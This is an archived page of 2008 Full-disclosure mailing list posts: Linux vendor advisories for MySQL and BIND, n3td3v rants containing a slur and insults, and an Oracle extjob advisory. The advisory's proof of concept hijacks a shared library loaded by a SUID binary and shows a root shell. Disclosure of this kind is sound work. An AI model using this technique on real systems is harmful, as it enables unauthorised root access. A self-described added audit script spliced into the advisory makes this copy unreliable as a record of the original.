[Full-disclosure] [ MDVSA-2008:150 ] - Updated mysql packages fix vulnerabilities

2008-07-19 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:150
 http://www.mandriva.com/security/
 ___
 
 Package: mysql
 Date: July 19, 2008
 Affected: 2007.1, 2008.0, Corporate 4.0
 ___
 
 Problem Description:
 
 Multiple buffer overflows in yaSSL, which is used in MySQL, allowed
 remote attackers to execute arbitrary code (CVE-2008-0226) or cause
 a denial of service via a special Hello packet (CVE-2008-0227).
 
 Sergei Golubchik found that MySQL did not properly validate optional
 data or index directory paths given in a CREATE TABLE statement, nor
 would it, under certain conditions, prevent two databases from using
 the same paths for data or index files.  This could allow an
 authenticated user with the privilege to create tables in one database
 to read and manipulate data in tables later created in other
 databases, regardless of GRANT privileges (CVE-2008-2079).
 
 The updated packages have been patched to correct these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0226
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0227
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2079
 ___
 
 Updated Packages:
 

Re: [Full-disclosure] Torvalds attacks IT industry 'security circus'

2008-07-19 Thread n3td3v
On Sat, Jul 19, 2008 at 7:34 PM, php0t <[EMAIL PROTECTED]> wrote:
>
> If I didn't feel you were moving towards being-serious-about-it, i'd give
> you a cookie for writing up so many useless, senseless, and obviously
> provocative thoughts about a subject where you lack even the slightest
> competence.
>
> P.
>

Blame Torvalds and Cnet News if you want to talk about provocative;
they are the ones that made me do the rant. If it wasn't for them I
would have no fuel for the rant I'm passionate about. So if you want to
know who is provocative, it's Torvalds and Cnet News.

Ever since Robert Lemos published a story about me I've been against
media outlets talking about mailing list comments; it's wrong. Nobody
wants their mailing list comments quoted in the media, and I wish
Securityfocus and Cnet News would stop it.

A few drunken rants of mine were taken and put into a PDF file and
written up in a Securityfocus news article by Robert Lemos, and you know
the government or whoever might have thought it was true because it was
written by people who thought they knew what they were talking about.

The truth is, three people were n3td3v? No, it was probably just me in
three states of sober, drunk and hungover, if the Neal Krawetz thing is
anything to be taken seriously.

And the n3td3v is a hacker group who targets Yahoo, Microsoft and
Google... that was another drunken rant comment by me that was whipped
up by Robert Lemos and Neal Krawetz to put in the media circus to sell
more ad clicks.

The truth is Torvalds was probably drunk as well when he wrote those
comments, so why don't the media stop quoting people on mailing lists
without at least emailing the author in private to ask if it was the
user's actual opinion or just simply a drunken slur rant like many of
the n3td3v emails are.

I wish the media would just stop using mailing list drama as a way to
make money. Stop quoting people on the mailing lists without
permission of the author and certainly don't write a PDF about n3td3v
without my side of the story getting any input.

The media circus, the Cnet News story about Torvalds, is exactly what
he's talking about, but him speaking out against the security industry
is a good thing. I'm sick of being the only one ranting about it, and
a big player has come out to call out the industry when it's
needed.

We need more drunk people on the mailing lists... it's the way ahead.
As long as the media don't quote people without asking first, and
Neal Krawetz and Robert Lemos should say sorry for being morons.

FYI: n3td3v is no hacker group... I'm just a fag with a Google group,
members of the public joined... once upon a time I was delusional, got
drunk and thought I was a hacker with a hacker group; in reality I'm
just a piss head alcoholic with no job or career.

Those times are gone, I'm older now and looking to the future... maybe
a job in the government as a toilet attendant, let's see.

All the best,

n3td3v


[Full-disclosure] [ MDVSA-2008:149 ] - Updated mysql packages fix vulnerabilities

2008-07-19 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:149
 http://www.mandriva.com/security/
 ___
 
 Package: mysql
 Date: July 19, 2008
 Affected: 2008.1
 ___
 
 Problem Description:
 
 Sergei Golubchik found that MySQL did not properly validate optional
 data or index directory paths given in a CREATE TABLE statement, nor
 would it, under certain conditions, prevent two databases from using
 the same paths for data or index files.  This could allow an
 authenticated user with the privilege to create tables in one database
 to read and manipulate data in tables later created in other
 databases, regardless of GRANT privileges (CVE-2008-2079).
 
 The updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2079
 ___
 
 Updated Packages:
 
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  

___
Full-Disclosure - We believe in it.
Charter: http://

[Full-disclosure] Torvalds attacks IT industry 'security circus'

2008-07-19 Thread n3td3v
The maker of Linux was right,

"In an e-mail to the Linux kernel developer mailing list, Torvalds
said a section of the security industry was dedicated to finding bugs
in software only to publicize their findings and gain notoriety."

http://news.cnet.com/Torvalds-attacks-IT-industry-security-circus/2100-1007_3-6243900.html

We've got to stop doing an HD Moore to make a name for ourselves and
release vulnerabilities for the right reason, not to become a cyber
security rock star!!!

The security industry is a circus; it's a joke what it's turned into.
It's not about security anymore, it's a media circus, with over hype and
over drive.

Let's cut away with the elitism and become normal people again who
aren't pumped up on steroids everyday to become famous.

The media are to blame, the Robert Lemos's and the others; they write
shit all the time just to make their companies' ad click money. They
don't really care what's written; as long as it's security related they
don't care.

As little research as possible and the most amount of over steer to
make the security industry sound more important and exciting than it
is.

Security, it's a dull field to be in; once you know it all you really
do know it all. It's a boring sport being a security professional.

That's why when some new disclosure comes along, we make a big deal of
it, to give us some excitement in your boring life.

This security industry is driven by the media to give it free
advertising and to drive up profits... the care about security takes
second shelf... the ad click and egoism comes first.

Go look at the web based archives of the less-busy mailing lists on
Securityfocus; it's a rat run of security conference spam when the
subject is supposed to be on security. That's what we've turned into, a
shaft of advertising mecca. In security we get to advertise for
free; in security we don't need to buy banner ads. In security we can
charge thousands of pounds a ticket to watch a nerd mumble in a voice
which only reflects the person's social isolation from the world and
the true life style of the geek, a sad lonely pisser, sitting in his
own urine and coding up exploit code to give his sad existence more
self worth. Fresh air doesn't exist in nerd land, only the recycled
air of our own farts and bad breath; at weekends we don't wash, and on
Monday your co-workers notice part of your beard you forgot to shave,
and you are wearing the same clothes you did last week and every week.
Do I sound bitter? It's because I probably am.

We need a shake, a good long shake; take hold of yourselves and see
what you've turned into. Is this what we want to be, a hyped up media
circus of wombats?

The security conference spam runs... let's outlaw that shit.

Month of browser bugs and Metasploit framework... let's trash that.

Dan Kaminsky... the man who changed internet security...Cnet staff,
let's scrap headlines like that.

The Pwnie awards & not letting Dan Kaminsky be nominated for most over
hyped bug: let's add him and every mother fucker in the industry as a
nomination; we're all over hyped and I'm sick of it.

And for next year's Pwnie awards, let's add a category for most
illegally spammed security conference and most over hyped security
conference, because they all are.

Buy your banner ads and get yourself off the mailing lists now and
forever in the future.

Stop advertising your security conferences through security
researchers and asking them to post the vulnerability a month before
the damn conference, we're not stupid we see through you. Yes, you the
leaders of the security conferences and the industry, the ones using
security researchers to make a lot of cash and make you dirty rich so
you can sit on a yacht for the rest of the year with chicks by your
side drinking champagne.

The leaders of the industry are exploiting the media and the security
researchers, they're in it for the money to tool up revenue, they
couldn't care less about us and cyber security... they just want to
become filthy rich.

It's people like you who are screwing it up for the future generation;
there won't be a security underground left in 10 years' time, because
the industry will have it graveyarded and scared the underground away
from existence.

People are scared the law will change; the government can show you, the
industry money makers, who's really in charge. We can make certain
things illegal for security researchers to do, and tighten up on how
much money you can make and exploit security researchers for.

In the sex trade there is human trafficking, in the security industry
there is the exploitation & trafficking of security researchers. So
what is the security industry making you researchers? A whore to the
cause of making money and not really caring about you or actual
security.

I've got one thing to say to security researchers... stop being
exploited by these people and go independent. Don't go to a security
conference; stand out in a market square in the middle of a town, and
invite an

[Full-disclosure] rPSA-2008-0231-1 bind bind-utils

2008-07-19 Thread rPath Update Announcements
rPath Security Advisory: 2008-0231-1
Published: 2008-07-19
Products:
rPath Linux 2

Rating: Major
Exposure Level Classification:
Remote System User Deterministic Weakness
Updated Versions:
[EMAIL PROTECTED]:2/9.4.2_P1-2-0.1
[EMAIL PROTECTED]:2/9.4.2_P1-2-0.1

rPath Issue Tracking System:
https://issues.rpath.com/browse/RPL-2378
https://issues.rpath.com/browse/RPL-2563
https://issues.rpath.com/browse/RPL-2657

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447

Description:
Previous versions of the bind package are vulnerable to a
cache-poisoning attack due to a weakness in the DNS protocol.
This update improves bind's resilience to this attack; however,
it does not provide a definitive solution.

Additionally, the bind package has been updated with root
nameserver information, including the new IP address for 
the "L" root nameserver.

http://wiki.rpath.com/Advisories:rPSA-2008-0231

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html



[Full-disclosure] Oracle Database Local Untrusted Library Path Vulnerability

2008-07-19 Thread Joxean Koret
Oracle Database Local Untrusted Library Path Vulnerability
--

The Oracle July 2008 Critical Patch Update fixes a vulnerability which
allows a user in the OINSTALL/DBA group to escalate privileges to root.

Escalating Privileges from "oracle" to "root"


In Oracle 10g R2 and later (Oracle 11g is also vulnerable) the affected
binary, $ORACLE_HOME/bin/extjob, is SUID root and must be SUID root. In
the following Oracle forum post you will find a note at the bottom of
the page:

(...)
 In 10.2.0.2 and higher

 rdbms/admin/externaljob.ora file must be owned by root:oraclegroup and
 be writable only by the owner i.e. 644 (rw-r--r--)

 bin/extjob file must be also owned by root:oraclegroup but must be
 setuid i.e. 4750 (-rwsr-x---)

 bin/extjobo should have normal 755 (rwxr-xr-x) permissions and be owned by
 oracle:oraclegroup

 In 11g and higher

 Same as 10.2.0.2 but additionally bin/jssu should exist with root setuid
 permissions i.e. owned by root:oraclegroup with 4750 (-rwsr-x---)
(...)

The "oraclegroup" is commonly "dba" or "oinstall". Regardless of the
group's name, if a user can execute OS commands from the database (for
example after an attacker gains DBA privileges by abusing an SQL
injection vulnerability), that user is allowed to execute, modify,
delete or create files under the ORACLE_HOME directory.

The following are the linked libraries of the extjob binary:

$ ldd $ORACLE_HOME/bin/extjob
linux-gate.so.1 =>  (0xe000)
libclntsh.so.10.1 => /home/joxean/oracle10g/product/10.2.0/db_2/lib/libclntsh.so.10.1 (0xb669d000)
libdl.so.2 => /lib/tls/i686/cmov/libdl.so.2 (0xb6681000)
libm.so.6 => /lib/tls/i686/cmov/libm.so.6 (0xb665f000)
libpthread.so.0 => /lib/tls/i686/cmov/libpthread.so.0 (0xb664d000)
libnsl.so.1 => /lib/tls/i686/cmov/libnsl.so.1 (0xb6638000)
libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb6509000)
libnnz10.so => /home/joxean/oracle10g/product/10.1.0/db_2/lib/libnnz10.so (0xb635f000)
libaio.so.1 => /usr/lib/libaio.so.1 (0xb635c000)
/lib/ld-linux.so.2 (0xb7f95000)

As you can see, two Oracle libraries are linked to the extjob binary. A
user in the oracle group can't change the "extjob" binary itself because
it's owned by root, but can replace the linked libraries to execute
arbitrary code with the privileges of "root". The following is an
example of what can be done:

-- Example with libclntsh.so

$ cat test.c
#include <stdio.h>
#include <stdlib.h>

/* Constructor: runs as soon as the dynamic loader maps this library into extjob. */
void __attribute__ ((constructor)) my_init(void)
{
    printf("[+] It works! Root shell...\n");
    system("/bin/sh");
}

$ cc test.c -fPIC -o test.so -shared
$ mv /home/joxean/oracle10g/product/10.2.0/db_2/lib/libclntsh.so.10.2 /home/joxean/oracle10g/product/10.2.0/db_2/lib/.libclntsh.so.10.2
$ mv test.so /home/joxean/oracle10g/product/10.2.0/db_2/lib/libclntsh.so.10.2
$ $ORACLE_HOME/bin/extjob
[+] It works! Root shell...
sh-3.1#

Notes
-

Despite the privileges needed, the vulnerability can be used in a
multi-stage attack to gain root privileges.

Workaround
--

Remove the SUID root bit from the extjob binary.
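As an added audit script, not part of Joxean Koret's advisory or of any Oracle tooling, the following POSIX shell checks for the condition described above: it walks the shared objects ldd reports for a setuid-root binary such as $ORACLE_HOME/bin/extjob and flags every library file, and every directory holding one, that is not owned by root or carries a group/world write bit. The directory check matters because the advisory's example replaces a library by renaming it, which needs write access to the directory, not to the file. ORACLE_HOME and the root owner are assumptions; TRUSTED_OWNER can be overridden.

```shell
#!/bin/sh
# Added audit script (not from the advisory). Flags libraries loaded by a
# setuid-root binary that a non-root account could replace, either because the
# file itself is writable or because its directory is (rename/replace attack).
# Assumption: trusted libraries are owned by root; override via TRUSTED_OWNER.

TRUSTED_OWNER="${TRUSTED_OWNER:-root}"

# path_is_unsafe PATH OWNER
# Returns 0 (unsafe) when PATH is missing, is not owned by OWNER, or has a group
# or world write bit; returns 1 (safe) otherwise. Parses `ls -ldL` (symlinks are
# followed) so it does not depend on a particular stat(1) implementation.
path_is_unsafe() {
    p="$1"
    owner="$2"
    set -- $(ls -ldL "$p" 2>/dev/null)
    [ -n "$3" ] || return 0          # ls failed: missing or unreadable path
    mode="$1"
    file_owner="$3"
    [ "$file_owner" = "$owner" ] || return 0
    case "$mode" in
        ?????w*|????????w*) return 0 ;;   # char 6 = group write, char 9 = other write
    esac
    return 1
}

# audit_setuid_binary BIN
# Resolves BIN's shared objects with ldd and reports each library, and each
# directory containing one, that fails path_is_unsafe. Returns 0 when clean,
# 1 when at least one replaceable path was found.
audit_setuid_binary() {
    bin="$1"
    bad=0
    if [ ! -u "$bin" ]; then
        echo "note: $bin is not setuid (the advisory's workaround is in place)"
    fi
    # "libfoo.so => /path/libfoo.so (0x...)" lines give $3; the bare loader line gives $1
    for lib in $(ldd "$bin" | awk '/=> \//{print $3} /^[[:space:]]*\//{print $1}'); do
        for p in "$lib" "$(dirname "$lib")"; do
            if path_is_unsafe "$p" "$TRUSTED_OWNER"; then
                echo "REPLACEABLE: $p (loaded by $bin)"
                bad=$((bad + 1))
            fi
        done
    done
    [ "$bad" -eq 0 ]
}

# Usage (assumes ORACLE_HOME is set):  sh audit_extjob.sh "$ORACLE_HOME/bin/extjob"
if [ "$#" -gt 0 ]; then
    audit_setuid_binary "$1"
fi
```

A clean result only means the loaded libraries are root-owned and non-writable; the advisory's workaround of dropping the SUID bit remains the direct fix.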

Disclaimer
--

The information in this advisory and any of its demonstrations is
provided "as is" without any warranty of any kind. 

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.

Contact
---

Joxean Koret - joxeankoret[at]yahoo[dot]es

References
--

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=727
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2613




[Full-disclosure] AFK from full-disclosure

2008-07-19 Thread Kingcope Kingcope
I am reachable
0nly @ two addresses from now on:

http://www.milw0rm.com
http://www.com-winner.com

Thanks n3td3v